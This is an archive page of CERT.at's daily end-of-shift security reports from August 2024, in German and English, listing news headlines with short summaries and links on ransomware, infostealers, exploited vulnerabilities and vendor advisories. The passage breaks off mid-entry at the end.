===================== = End-of-Day report = ===================== Timeframe: Donnerstag 22-08-2024 18:00 − Freitag 23-08-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Qilin ransomware now steals credentials from Chrome browsers ∗∗∗ --------------------------------------------- The Qilin ransomware group has been using a new tactic and deploys a custom stealer to steal account credentials stored in Google Chrome browser. --------------------------------------------- https://www.bleepingcomputer.com/news/security/qilin-ransomware-now-steals-… ∗∗∗ Hackers are exploiting critical bug in LiteSpeed Cache plugin ∗∗∗ --------------------------------------------- Hackers have already started to exploit the critical severity vulnerability that affects LiteSpeed Cache, a WordPress plugin used for accelerating response times, a day after technical details become public. --------------------------------------------- https://www.bleepingcomputer.com/news/security/hackers-are-exploiting-criti… ∗∗∗ Warnung vor Ebola-Infektion: Uni löst mit Phishing-Test unnötige Panik aus ∗∗∗ --------------------------------------------- Studenten und Mitarbeiter der UCSC haben per E-Mail eine falsche Warnung vor einer Ebola-Infektion auf dem Campus erhalten. Der CISO der Uni entschuldigt sich. --------------------------------------------- https://www.golem.de/news/warnung-vor-ebola-infektion-phishing-test-an-eine… ∗∗∗ Mäh- und Saugroboter: Ecovacs will Spionagelücken nun doch angehen ∗∗∗ --------------------------------------------- Mehrere Mäh- und Saugroboter von Ecovacs lassen sich von Angreifern übernehmen. Erst wollte der Hersteller gar nicht patchen, doch nun kommt die Kehrtwende. --------------------------------------------- https://www.golem.de/news/hersteller-lenkt-ein-ecovacs-arbeitet-nun-doch-an… ∗∗∗ WordPress Websites Used to Distribute ClearFake Trojan Malware ∗∗∗ --------------------------------------------- Unfortunately, scams are all over the place, and anybody who has surfed the web should know this. We’ve all gotten phishing emails, or redirected to questionable websites at some point or another. Being on your guard is an important posture to take online, and part of that is knowing how to identify threats, scams, or places you shouldn’t visit .. --------------------------------------------- https://blog.sucuri.net/2024/08/wordpress-websites-used-to-distribute-clear… ∗∗∗ Chinese Hackers Exploit Zero-Day Cisco Switch Flaw to Gain System Control ∗∗∗ --------------------------------------------- Details have emerged about a China-nexus threat groups exploitation of a recently disclosed, now-patched security flaw in Cisco switches as a zero-day to seize control of the appliances and evade detection.The activity, attributed to Velvet Ant, was .. --------------------------------------------- https://thehackernews.com/2024/08/chinese-hackers-exploit-zero-day-cisco.ht… ∗∗∗ Halliburton probes an issue disrupting business ops ∗∗∗ --------------------------------------------- What could the problem be? Reportedly, a cyberattack American oil giant Halliburton is investigating an "issue," reportedly a cyberattack, that has disrupted some business operations and global networks. --------------------------------------------- https://www.theregister.com/2024/08/22/halliburton_investigates_incident_am… ∗∗∗ Bling Libra’s Tactical Evolution: The Threat Actor Group Behind ShinyHunters Ransomware ∗∗∗ --------------------------------------------- We analyze a recent incident by Bling Libra, the group behind ShinyHunters ransomware as they shift from data theft to extortion, exploiting AWS credentials. --------------------------------------------- https://unit42.paloaltonetworks.com/shinyhunters-ransomware-extortion/ ∗∗∗ CrowdStrike Outage Timeline and Analysis ∗∗∗ --------------------------------------------- Bitsights analysis of the CrowdStrike outage and timeline mysteries. --------------------------------------------- https://www.bitsight.com/blog/crowdstrike-outage-timeline-and-analysis ∗∗∗ A Global Treaty to Fight Cybercrime—Without Combating Mercenary Spyware: Article by Kate Robertson in Lawfare ∗∗∗ --------------------------------------------- In an article for Lawfare, the Citizen Labs senior research associate Kate Robertson analyzes how, in its current form, the draft treaty is poised "to become a vehicle for complicity in the global mercenary spy trade." --------------------------------------------- https://citizenlab.ca/2024/08/a-global-treaty-to-fight-cybercrime-without-c… ===================== = Vulnerabilities = ===================== ∗∗∗ SonicOS Improper Access Control Vulnerability ∗∗∗ --------------------------------------------- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0015 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 22.08.2024
by Daily end-of-shift report 22 Aug '24

22 Aug '24

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 21-08-2024 18:00 − Donnerstag 22-08-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Google fixes ninth Chrome zero-day exploited in attacks this year ∗∗∗ --------------------------------------------- Today, Google released a new Chrome emergency security update to patch a zero-day vulnerability, the ninth one tagged as exploited this year. --------------------------------------------- https://www.bleepingcomputer.com/news/security/google-fixes-tenth-actively-… ∗∗∗ U.S. charges Karakurt extortion gang’s “cold case” negotiator ∗∗∗ --------------------------------------------- A member of the Russian Karakurt ransomware group has been charged in the U.S. for money laundering, wire fraud, and extortion crimes. --------------------------------------------- https://www.bleepingcomputer.com/news/legal/us-charges-karakurt-extortion-g… ∗∗∗ Löschpflicht und Sicherheitslücken: Bußgelder wegen Datenschutzverstößen häufen sich ∗∗∗ --------------------------------------------- In Hamburg wurden bereits jetzt mehr Bußgeldverfahren wegen Datenschutzverstößen abgeschlossen als im Kalenderjahr 2023. Die Strafen sind mitunter hoch. --------------------------------------------- https://www.golem.de/news/loeschpflicht-und-sicherheitsluecken-bussgelder-w… ∗∗∗ Memory corruption vulnerabilities in Suricata and FreeRDP ∗∗∗ --------------------------------------------- While pentesting KasperskyOS-based Thin Client and IoT Secure Gateway, we found several vulnerabilities in the Suricata and FreeRDP open-source projects. We shared details on these vulnerabilities with the community along with our fuzzer. --------------------------------------------- https://securelist.com/suricata-freerdp-memory-corruption/113489/ ∗∗∗ Windows Security best practices for integrating and managing security tools ∗∗∗ --------------------------------------------- We examine the recent CrowdStrike outage and provide a technical overview of the root cause. --------------------------------------------- https://www.microsoft.com/en-us/security/blog/2024/07/27/windows-security-b… ∗∗∗ Understanding the ‘Morphology’ of Ransomware: A Deeper Dive ∗∗∗ --------------------------------------------- Ransomware isnt just about malware. Its about brands, trust, and the shifting allegiances of cybercriminals. --------------------------------------------- https://www.securityweek.com/understanding-the-morphology-of-ransomware-a-d… ∗∗∗ Recall: Microsofts umstrittenes "Überwachungs"-Feature kommt zurück ∗∗∗ --------------------------------------------- Nach heftigen Sicherheitsbedenken will das Unternehmen bei der neuen KI-Funktion nachgebessert haben --------------------------------------------- https://www.derstandard.at/story/3000000233374/recall-microsofts-umstritten… ∗∗∗ BLUUID: Firewallas, Diabetics, And… Bluetooth ∗∗∗ --------------------------------------------- Dive into the fascinating and overlooked realm of Bluetooth Low Energy (BTLE) security in GreyNoise Labs latest blog post. Learn techniques for remote device identification, uncover vulnerabilities, and explore the broader implications for IoT and healthcare. --------------------------------------------- https://www.greynoise.io/blog/bluuid-firewallas-diabetics-and-bluetooth ∗∗∗ PEAKLIGHT: Decoding the Stealthy Memory-Only Malware ∗∗∗ --------------------------------------------- Mandiant identified a new memory-only dropper using a complex, multi-stage infection process. This memory-only dropper decrypts and executes a PowerShell-based downloader. This PowerShell-based downloader is being tracked as PEAKLIGHT.OverviewMandiant Managed Defense identified a memory-only dropper and downloader delivering .. --------------------------------------------- https://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding… ∗∗∗ Angreifer können Ciscos VoIP-System Unified Communications Manager lahmlegen ∗∗∗ --------------------------------------------- Aufgrund von Sicherheitslücken sind Attacken auf mehrere Cisco-Produkte möglich. Updates sind verfügbar. --------------------------------------------- https://heise.de/-9843447 ===================== = Vulnerabilities = ===================== ∗∗∗ Cisco Unified Communications Manager Denial of Service Vulnerability ∗∗∗ --------------------------------------------- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso… ∗∗∗ Cisco Identity Services Engine REST API Blind SQL Injection Vulnerabilities ∗∗∗ --------------------------------------------- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso… ∗∗∗ Cisco Identity Services Engine Sensitive Information Disclosure Vulnerability ∗∗∗ --------------------------------------------- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso… ∗∗∗ Cisco Identity Services Engine Cross-Site Request Forgery Vulnerability ∗∗∗ --------------------------------------------- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso… ∗∗∗ Cisco Unified Communications Manager Cross-Site Scripting Vulnerability ∗∗∗ --------------------------------------------- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso… ∗∗∗ Atlassian Jira August 2024 Security Update Advisory ∗∗∗ --------------------------------------------- https://asec.ahnlab.com/en/82562/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 21.08.2024
by Daily end-of-shift report 21 Aug '24

21 Aug '24

===================== = End-of-Day report = ===================== Timeframe: Dienstag 20-08-2024 18:00 − Mittwoch 21-08-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ CrowdStrike unhappy with “shady commentary” from competitors after outage ∗∗∗ --------------------------------------------- Botched update leads to claims that competitors are "ambulance chasing." --------------------------------------------- https://arstechnica.com/?p=2044431 ∗∗∗ GitHub Enterprise Server vulnerable to critical auth bypass flaw ∗∗∗ --------------------------------------------- A critical vulnerability affecting multiple versions of GitHub Enterprise Server could be exploited to bypass authentication and enable an attacker to gain administrator privileges on the machine. --------------------------------------------- https://www.bleepingcomputer.com/news/security/github-enterprise-server-vul… ∗∗∗ Großer Chipkonzern: Cyberangriff stört Produktion von Microchip Technology ∗∗∗ --------------------------------------------- Die Produktionskapazitäten des Chipherstellers sind derzeit eingeschränkt. Ursache ist eine Cyberattacke, deren Ausmaß aktuell untersucht wird. --------------------------------------------- https://www.golem.de/news/grosser-chipkonzern-cyberangriff-stoert-produktio… ∗∗∗ Sicherheitsprobleme: Lastenrad-Skandal weitet sich aus ∗∗∗ --------------------------------------------- Niederländische Verbraucherschützer untersuchen weitere Lastenradhersteller, weil dort ebenfalls gravierende Mängel aufgetreten sind. --------------------------------------------- https://www.golem.de/news/sicherheitsprobleme-lastenrad-skandal-weitet-sich… ∗∗∗ Plane tracker FlightAware admits user passwords, SSNs exposed for years ∗∗∗ --------------------------------------------- Notification omits a number of key details Popular flight-tracking app FlightAware has admitted that it was exposing a bunch of users data for more than three years. --------------------------------------------- https://www.theregister.com/2024/08/20/flightaware_data_exposure/ ∗∗∗ An AWS Configuration Issue Could Expose Thousands of Web Apps ∗∗∗ --------------------------------------------- Amazon has updated its instructions for how customers should more securely implement AWSs traffic-routing service known as Application Load Balancer, but its not clear everyone will get the memo. --------------------------------------------- https://www.wired.com/story/aws-application-load-balancer-implementation-co… ∗∗∗ Teach a Man to Phish ∗∗∗ --------------------------------------------- I decided to give away all of my phishing secrets for free. I realized at some point that I have been giving away phishing secrets for years, but only to select individuals, and only one at a time. That method of knowledge dissemination is terribly inefficient! So here it is, I’ve written it down for you instead. --------------------------------------------- https://posts.specterops.io/teach-a-man-to-phish-43528846e382 ∗∗∗ CISA Adds Four Known Exploited Vulnerabilities to Catalog ∗∗∗ --------------------------------------------- CISA has added four new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. --------------------------------------------- https://www.cisa.gov/news-events/alerts/2024/08/21/cisa-adds-four-known-exp… ∗∗∗ CPU-Sicherheitsleck Sinkclose: Firmware-Update auch für AMDs Ryzen 3000 ∗∗∗ --------------------------------------------- Die CPU-Sicherheitslücke "Sinkclose" ermöglicht Angreifern das Einschleusen von Schadcode. Für ältere CPUs waren erst keine Updates geplant. --------------------------------------------- https://heise.de/-9842780 ===================== = Vulnerabilities = ===================== ∗∗∗ Unauthenticated information leak in Bosch IP cameras ∗∗∗ --------------------------------------------- BOSCH-SA-659648: A vulnerability was discovered in internal testing of Bosch IP cameras of families CPP13 and CPP14, that allows an unauthenticated attacker to retrieve video analytics event data. No video data is leaked through this vulnerability. --------------------------------------------- https://psirt.bosch.com/security-advisories/bosch-sa-659648.html ∗∗∗ DSA-5752-1 dovecot - security update ∗∗∗ --------------------------------------------- https://lists.debian.org/debian-security-announce/2024/msg00165.html ∗∗∗ [20240803] - Core - XSS in HTML Mail Templates ∗∗∗ --------------------------------------------- https://developer.joomla.org:443/security-centre/944-20240803-core-xss-in-h… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 20.08.2024
by Daily end-of-shift report 20 Aug '24

20 Aug '24

===================== = End-of-Day report = ===================== Timeframe: Montag 19-08-2024 18:00 − Dienstag 20-08-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Windows driver zero-day exploited by Lazarus hackers to install rootkit ∗∗∗ --------------------------------------------- The notorious North Korean Lazarus hacking group exploited a zero-day flaw in the Windows AFD.sys driver to elevate privileges and install the FUDModule rootkit on targeted systems. --------------------------------------------- https://www.bleepingcomputer.com/news/microsoft/windows-driver-zero-day-exp… ∗∗∗ Solaranlagen und die Cloud: Entwickler befürchtet Kollaps europäischer Stromnetze ∗∗∗ --------------------------------------------- Moderne Solaranlagen sind häufig mit Clouddiensten der Hersteller verbunden. Ein Entwickler sieht darin eine große Gefahr für unsere Energieversorgung. --------------------------------------------- https://www.golem.de/news/solaranlagen-und-die-cloud-entwickler-befuerchtet… ∗∗∗ Approach to mainframe penetration testing on z/OS ∗∗∗ --------------------------------------------- We explain how mainframes work, potential attack vectors, and what to focus on when pentesting such systems. --------------------------------------------- https://securelist.com/zos-mainframe-pentesting/113427/ ∗∗∗ Hacking Wireless Bicycle Shifters ∗∗∗ --------------------------------------------- This is yet another insecure Internet-of-things story, this one about wireless gear shifters for bicycles. These gear shifters are used in big-money professional bicycle races like the Tour de France, which provides an incentive to actually .. --------------------------------------------- https://www.schneier.com/blog/archives/2024/08/hacking-wireless-bicycle-shi… ∗∗∗ Ransomware Victims Paid $460 Million in First Half of 2024 ∗∗∗ --------------------------------------------- Ransomware payments in H1 2024 totaled nearly $460 million and $1.58 billion have been stolen in cryptocurrency heists. --------------------------------------------- https://www.securityweek.com/ransomware-victims-paid-460-million-in-first-h… ∗∗∗ Critical Flaw in Donation Plugin Exposed 100,000 WordPress Sites to Takeover ∗∗∗ --------------------------------------------- A critical vulnerability in the GiveWP WordPress plugin could be exploited for remote code execution and arbitrary file deletion. --------------------------------------------- https://www.securityweek.com/critical-flaw-in-donation-plugin-exposed-10000… ∗∗∗ Navigating the Uncharted: A Framework for Attack Path Discovery ∗∗∗ --------------------------------------------- This is the second post in a series on Identity-Driven Offensive Tradecraft, which is also the focus of the new course we will launch in October. In the previous post, I asked, “How does one discover and abuse new attack paths?” To start answering .. --------------------------------------------- https://posts.specterops.io/navigating-the-uncharted-a-framework-for-attack… ∗∗∗ Selling Ransomware Breaches: 4 Trends Spotted on the RAMP Forum ∗∗∗ --------------------------------------------- The sale and purchase of unauthorized access to compromised enterprise networks has become a linchpin for cybercriminal operations, particularly in facilitating ransomware attacks. --------------------------------------------- https://www.rapid7.com/blog/post/2024/08/20/selling-ransomware-breaches-4-t… ∗∗∗ Challenges in Automating and Scaling Remote Vulnerability Detection ∗∗∗ --------------------------------------------- We cover investments that Bitsight is making to greatly scale out our vulnerability coverage in record time through automation. --------------------------------------------- https://www.bitsight.com/blog/challenges-automating-and-scaling-remote-vuln… ∗∗∗ Österreichs Innenminister will Messenger ausspionieren ∗∗∗ --------------------------------------------- Österreichs Geheimdienste sollen mehr Befugnisse erhalten, Malware einschleusen und WLAN-Catcher nutzen dürfen. Das beantragt die Regierungspartei ÖVP. --------------------------------------------- https://heise.de/-9840256 ∗∗∗ Softwareentwicklung: Schadcode-Attacken auf Jenkins-Server beobachtet ∗∗∗ --------------------------------------------- Derzeit nutzen Angreifer eine kritische Lücke im Software-System Jenkins aus. Davon sind auch Instanzen in Deutschland bedroht. --------------------------------------------- https://heise.de/-9840463 ===================== = Vulnerabilities = ===================== ∗∗∗ SolarWinds Product Security Update Advisory (CVE-2024-28986) ∗∗∗ --------------------------------------------- https://asec.ahnlab.com/en/82529/ ∗∗∗ Intel Family Security Update Advisory ∗∗∗ --------------------------------------------- https://asec.ahnlab.com/en/82531/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 19.08.2024
by Daily end-of-shift report 19 Aug '24

19 Aug '24

===================== = End-of-Day report = ===================== Timeframe: Freitag 16-08-2024 18:00 − Montag 19-08-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Nachbetrachtung: Windows und die TCP-IP-Schwachstelle CVE-2024-38063 ∗∗∗ --------------------------------------------- Zum 13. August 2024 wurde die 0-day-Schwachstelle CVE-2024-38063 in Windows bekannt. Es handelt sich um eine Remote-Code-Execution-Schwachstelle in der TCP/IP-Implementierung von Windows steckt. Angreifer können über IPv6-Pakete einen Host kompromittieren und dort Code ausführen. Weben der Bewertung mit dem CVEv3 Score 9.8 (critical, "Exploitation More Likely") empfiehlt Redmond Administratoren momentan IPv6 zu deaktivieren, hat aber auch Sicherheitsupdates für Windows bereitgestellt. Hier sollten Administratoren also reagieren. --------------------------------------------- https://www.borncity.com/blog/2024/08/16/nachbetrachtung-windows-und-die-tc… ∗∗∗ Technical Analysis: CVE-2024-38021 ∗∗∗ --------------------------------------------- Recently, Morphisec researchers discovered a vulnerability in Microsoft Outlook that can lead to remote code execution (RCE). This vulnerability, identified as CVE-2024-38021, highlights a significant security flaw within the Microsoft Outlook application, potentially allowing attackers to execute arbitrary code without requiring prior authentication. --------------------------------------------- https://blog.morphisec.com/technical-analysis-cve-2024-38021 ∗∗∗ New Mad Liberator gang uses fake Windows update screen to hide data theft ∗∗∗ --------------------------------------------- A new data extortion group tracked as Mad Liberator is targeting AnyDesk users and runs a fake Microsoft Windows update screen to distract while exfiltrating data from the target device. [..] It is unclear how the threat actor selects its targets but one theory, although yet to be proven, is that Mad Liberator tries potential addresses (AnyDesk connection IDs) until someone accepts the connection request. --------------------------------------------- https://www.bleepingcomputer.com/news/security/new-mad-liberator-gang-uses-… ∗∗∗ Chrome will redact credit cards, passwords when you share Android screen ∗∗∗ --------------------------------------------- While the flag doesn't work at the moment, it is supposed to hide sensitive form fields present on the page by redacting the entire screen. It's unclear when the feature will be rolled out to everyone in Chrome for Android, but you'll be able to try the feature in Chrome Canary in the next few weeks. --------------------------------------------- https://www.bleepingcomputer.com/news/google/chrome-will-redact-credit-card… ∗∗∗ AMD knickt ein: Ryzen 3000 erhält nun doch Patch gegen Sinkclose-Lücke ∗∗∗ --------------------------------------------- Ursprünglich wollte AMD Ryzen-3000-CPUs nicht gegen die Sinkclose-Lücke patchen. Nach reichlich Unmut in der Community folgt nun die Kehrtwende. --------------------------------------------- https://www.golem.de/news/amd-knickt-ein-ryzen-3000-erhaelt-nun-doch-patch-… ∗∗∗ Verbesserung der Netzwerksicherheit: Überwachung der Client-Kommunikation mit Velociraptor ∗∗∗ --------------------------------------------- SEC Defence, die Managed Incident Response-Einheit von SEC Consult, hat eine Reihe von Velociraptor-Artefakten entwickelt, die es ermöglichen, die aktuelle Netzwerkkommunikation auf registrierten Clients zu überwachen und bei bestimmten Verbindungen zu alarmieren, z. B. zu bekannten bösartigen IP-Adressen oder Verbindungen, die von bekannten bösartigen Prozessen erstellt wurden. --------------------------------------------- https://sec-consult.com/de/blog/detail/verbesserung-der-netzwerksicherheit-… ∗∗∗ Xeon Sender Tool Exploits Cloud APIs for Large-Scale SMS Phishing Attacks ∗∗∗ --------------------------------------------- Malicious actors are using a cloud attack tool named Xeon Sender to conduct SMS phishing and spam campaigns on a large scale by abusing legitimate services."Attackers can use Xeon to send messages through multiple software-as-a-service (SaaS) providers using valid credentials for the service providers," SentinelOne security researcher Alex Delamotte said in a report shared with The Hacker News. --------------------------------------------- https://thehackernews.com/2024/08/xeon-sender-tool-exploits-cloud-apis.html ∗∗∗ Microsoft Azure: Ab 15. Oktober 2024 MFA für Administratoren verpflichtend, aber "Aufschub" möglich ∗∗∗ --------------------------------------------- Microsoft hat gerade im M365 Admin-Nachrichten-Center bekannt gegeben, dass man bei Azure ab dem 15.10.2024 die Authentifizierung der Administratoren über MFA verlangt. Redmond gewährt aber Administratoren die Möglichkeit, diese Verpflichtung um insgesamt 5 Monate zu verschieben. --------------------------------------------- https://www.borncity.com/blog/2024/08/17/microsoft-azure-ab-15-oktober-2024… ∗∗∗ Unmasking Styx Stealer: How a Hacker’s Slip Led to an Intelligence Treasure Trove ∗∗∗ --------------------------------------------- The case of Styx Stealer is a compelling example of how even sophisticated cybercriminal operations can slip up due to basic security oversights. The creator of Styx Stealer revealed his personal details, including Telegram accounts, emails, and contacts, by debugging the stealer on his own computer with a Telegram bot token provided by a customer involved in the Agent Tesla campaign. This critical OpSec failure not only compromised his anonymity but also provided valuable intelligence about other cybercriminals, including the originator of the Agent Tesla campaign. --------------------------------------------- https://research.checkpoint.com/2024/unmasking-styx-stealer-how-a-hackers-s… ∗∗∗ "WireServing" Up Credentials: Escalating Privileges in Azure Kubernetes Services ∗∗∗ --------------------------------------------- Mandiant disclosed this vulnerability to Microsoft via the MSRC vulnerability disclosure program, and Microsoft has fixed the underlying issue. [..] Adopting a process to create restrictive NetworkPolicies that allow access only to required services prevents this entire attack class. Privilege escalation via an undocumented service is prevented when the service cannot be accessed at all. --------------------------------------------- https://cloud.google.com/blog/topics/threat-intelligence/escalating-privile… ∗∗∗ Bericht: Pixel-Handys mit heimlicher, aber inaktiver Fernwartung ausgeliefert ∗∗∗ --------------------------------------------- Pixel-Smartphones wurden auf Wunsch Verizons mit Fernwartungssoftware ausgeliefert. Wenn aktiviert, kann sie unsicheren Code nachladen. --------------------------------------------- https://heise.de/-9836726 ∗∗∗ Jetzt patchen! Schadcode-Attacken auf Solarwinds Web Help Desk beobachtet ∗∗∗ --------------------------------------------- Angreifer nutzen derzeit eine kritische Schwachstelle Solarwinds Web Help Desk aus. Ein Sicherheitspatch ist verfügbar, kann aber mitunter für Probleme sorgen. --------------------------------------------- https://heise.de/-9838566 ∗∗∗ SIM-Swapping bleibt in Deutschland Randphänomen ∗∗∗ --------------------------------------------- Zahlreiche Medien warnen vor Schäden durch SIM-Swapping. Die Betrugsmasche bleibt in Deutschland jedoch selten. --------------------------------------------- https://heise.de/-9839531 ===================== = Vulnerabilities = ===================== ∗∗∗ Mehrere Sicherheitsschwachstellen in IDOL2 (uciIDOL) ∗∗∗ --------------------------------------------- Fünf schwerwiegende Sicherheitsschwachstellen wurden in der Zeiterfassungssoftware IDOL2 (uciIDOL) identifiziert. Sie ermöglichen es, die verschlüsselte Kommunikation zwischen Client und Server vollständig zu kompromittieren. Außerdem erlauben sie Remote Code Execution sowohl auf Client- als auch auf Serverseite. --------------------------------------------- https://www.syss.de/pentest-blog/mehrere-sicherheitsschwachstellen-in-idol-… ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (python-asyncssh), Fedora (bind, bind-dyndb-ldap, httpd, and tor), SUSE (cosign, cpio, curl, expat, java-11-openjdk, ncurses, netty, netty-tcnative, opera, python-Django, python-Pillow, shadow, sudo, and wpa_supplicant), and Ubuntu (firefox). --------------------------------------------- https://lwn.net/Articles/986225/ ∗∗∗ WebKitGTK and WPE WebKit Security Advisory WSA-2024-0004 ∗∗∗ --------------------------------------------- https://webkitgtk.org/security/WSA-2024-0004.html ∗∗∗ F5: K000140732: BIND vulnerability CVE-2024-1737 ∗∗∗ --------------------------------------------- https://my.f5.com/manage/s/article/K000140732 ∗∗∗ Kubernetes: CVE-2024-7646 ∗∗∗ --------------------------------------------- https://github.com/kubernetes/kubernetes/issues/126744 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 16.08.2024
by Daily end-of-shift report 16 Aug '24

16 Aug '24

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 14-08-2024 18:00 − Freitag 16-08-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Opinion: More layers in malware campaigns are not a sign of sophistication ∗∗∗ --------------------------------------------- Ten infection and protection layers to deploy malware sounds impressive and very hard to deal with. However, adding more layers counterintuitively does the opposite for antivirus evasion and is not a sign of sophistication. Why is that so? --------------------------------------------- https://www.gdatasoftware.com/blog/2024/08/37995-malware-sophistication ∗∗∗ Ailurophile: New Infostealer sighted in the wild ∗∗∗ --------------------------------------------- We discovered a new stealer in the wild called "Ailurophile Stealer”. The stealer is coded in PHP and the source code indicates potential Vietnamese origins. It is available for purchase through a subscription model via its own webpage. Through the .. --------------------------------------------- https://www.gdatasoftware.com/blog/2024/08/38005-ailurophile-infostealer ∗∗∗ Tusk: unraveling a complex infostealer campaign ∗∗∗ --------------------------------------------- Kaspersky researchers discovered Tusk campaign with ongoing activity that uses Danabot and StealC infostealers and clippers to obtain cryptowallet credentials and system data. --------------------------------------------- https://securelist.com/tusk-infostealers-campaign/113367/ ∗∗∗ PrestaShop GTAG Websocket Skimmer ∗∗∗ --------------------------------------------- During a recent investigation we uncovered another credit card skimmer leveraging a web socket connection to steal credit card details from an infected PrestaShop website.While PrestaShop is not the most popular eCommerce solution for online stores it is still in the top 10 most common ecommerce platforms in use on the web, and clocks in at just .. --------------------------------------------- https://blog.sucuri.net/2024/08/prestashop-gtag-websocket-skimmer.html ∗∗∗ Ransomware Attacks on Industrial Firms Surged in Q2 2024 ∗∗∗ --------------------------------------------- Dragos has seen a significant increase in ransomware attacks on industrial organizations in Q2 2024 compared to the previous quarter. --------------------------------------------- https://www.securityweek.com/ransomware-attacks-on-industrial-firms-surged-… ∗∗∗ Leaked Environment Variables Allow Large-Scale Extortion Operation of Cloud Environments ∗∗∗ --------------------------------------------- We recount an extensive cloud extortion campaign leveraging exposed .env files of at least 110k domains to compromise organizations AWS environments. --------------------------------------------- https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/ ∗∗∗ New infostealer targets macOS devices, appears to have Russian links ∗∗∗ --------------------------------------------- Researchers have discovered new information-stealing malware labeled Banshee Stealer that is designed to breach Apple computers. --------------------------------------------- https://therecord.media/apple-macos-infostealer-banshee-stealer ∗∗∗ Iranian backed group steps up phishing campaigns against Israel, U.S. ∗∗∗ --------------------------------------------- Google’s Threat Analysis Group shares insights on APT42, an Iranian government-backed threat actor. --------------------------------------------- https://blog.google/threat-analysis-group/iranian-backed-group-steps-up-phi… ∗∗∗ Ransomware Prevention Guide for Managed Service Providers ∗∗∗ --------------------------------------------- This comprehensive ransomware prevention guide outlines a strategic approach to preventing ransomware attacks, drawing upon industry best practices, compelling statistics, and expert insights. --------------------------------------------- https://www.emsisoft.com/en/blog/45911/ransomware-prevention-guide-for-mana… ∗∗∗ Hacking Beyond.com — Enumerating Private TLDs ∗∗∗ --------------------------------------------- My story started a few months ago, when I performed a red team assessment for a major retail company. During the Open Source Reconnaissance (OSINT) phase, I reviewed the SSL certificates that included the client name. In these certificates I identified that the client owned its own top-level domain (TLD). A TLD is the last part of a domain name, the letters that come after .. --------------------------------------------- https://cloud.google.com/blog/topics/threat-intelligence/enumerating-privat… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Fedora (389-ds-base, dotnet8.0, python3.13, roundcubemail, thunderbird, and tor), Mageia (roundcubemail), Oracle (.NET 8.0, bind and bind-dyndb-ldap, bind9.16, container-tools:ol8, edk2, firefox, gnome-shell, grafana, httpd:2.4, jose, kernel, krb5, mod_auth_openidc:2.3, orc, poppler, python-urllib3, .. --------------------------------------------- https://lwn.net/Articles/985980/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 14.08.2024
by Daily end-of-shift report 14 Aug '24

14 Aug '24

===================== = End-of-Day report = ===================== Timeframe: Dienstag 13-08-2024 18:00 − Mittwoch 14-08-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Neue Betrugsmasche auf WhatsApp: Vorsicht vor gefälschten Sicherheitswarnungen ∗∗∗ --------------------------------------------- Derzeit kursieren gefälschte SMS, angeblich vom WhatsApp-Sicherheitscenter. Die Nachricht besagt, dass Ihr Konto gefährdet sei und Sie eine Überprüfung im offiziellen Sicherheitscenter vornehmen müssen. --------------------------------------------- https://www.watchlist-internet.at/news/neue-betrugsmasche-auf-whatsapp-vors… ∗∗∗ Versuchte Leistungserschleichung bei Sicherheitsunternehmen ∗∗∗ --------------------------------------------- Mehrere Sicherheitsunternehmen (insbesondere im Bereich von Threat Intelligence) berichten von Versuchen von Bedrohungsakteuren sich unter Vortäuschung falscher Tatsachen Zugriff auf die Produkte betroffener Firmen zu verschaffen. --------------------------------------------- https://www.cert.at/de/aktuelles/2024/8/versuchte-leistungserschleichung-be… ∗∗∗ Biden administration pledges $11 million to open source security initiative ∗∗∗ --------------------------------------------- The White House and Department of Homeland Security (DHS) are partnering on an $11 million initiative to gain an understanding of how open source software is used across critical infrastructure and to better secure it. --------------------------------------------- https://therecord.media/open-source-software-security-white-house-dhs-11mil… ∗∗∗ FIN7: The Truth Doesnt Need to be so STARK ∗∗∗ --------------------------------------------- The purpose of this blog post is not to exhaustively identify FIN7 infrastructure; rather, it represents a snapshot in time of activity hosted on the infrastructure of one hosting provider (Stark). --------------------------------------------- https://www.team-cymru.com/post/fin7-the-truth-doesn-t-need-to-be-so-stark ∗∗∗ Gafgyt Malware Variant Exploits GPU Power and Cloud Native Environments ∗∗∗ --------------------------------------------- In this blog we explain about the campaign, the techniques used and how to detect and protect your environments. --------------------------------------------- https://blog.aquasec.com/gafgyt-malware-variant-exploits-gpu-power-and-clou… ∗∗∗ Rivers of Phish: Sophisticated Phishing Targets Russia’s Perceived Enemies Around the Globe ∗∗∗ --------------------------------------------- This campaign, which we have investigated in collaboration with Access Now and with the participation of numerous civil society organizations including First 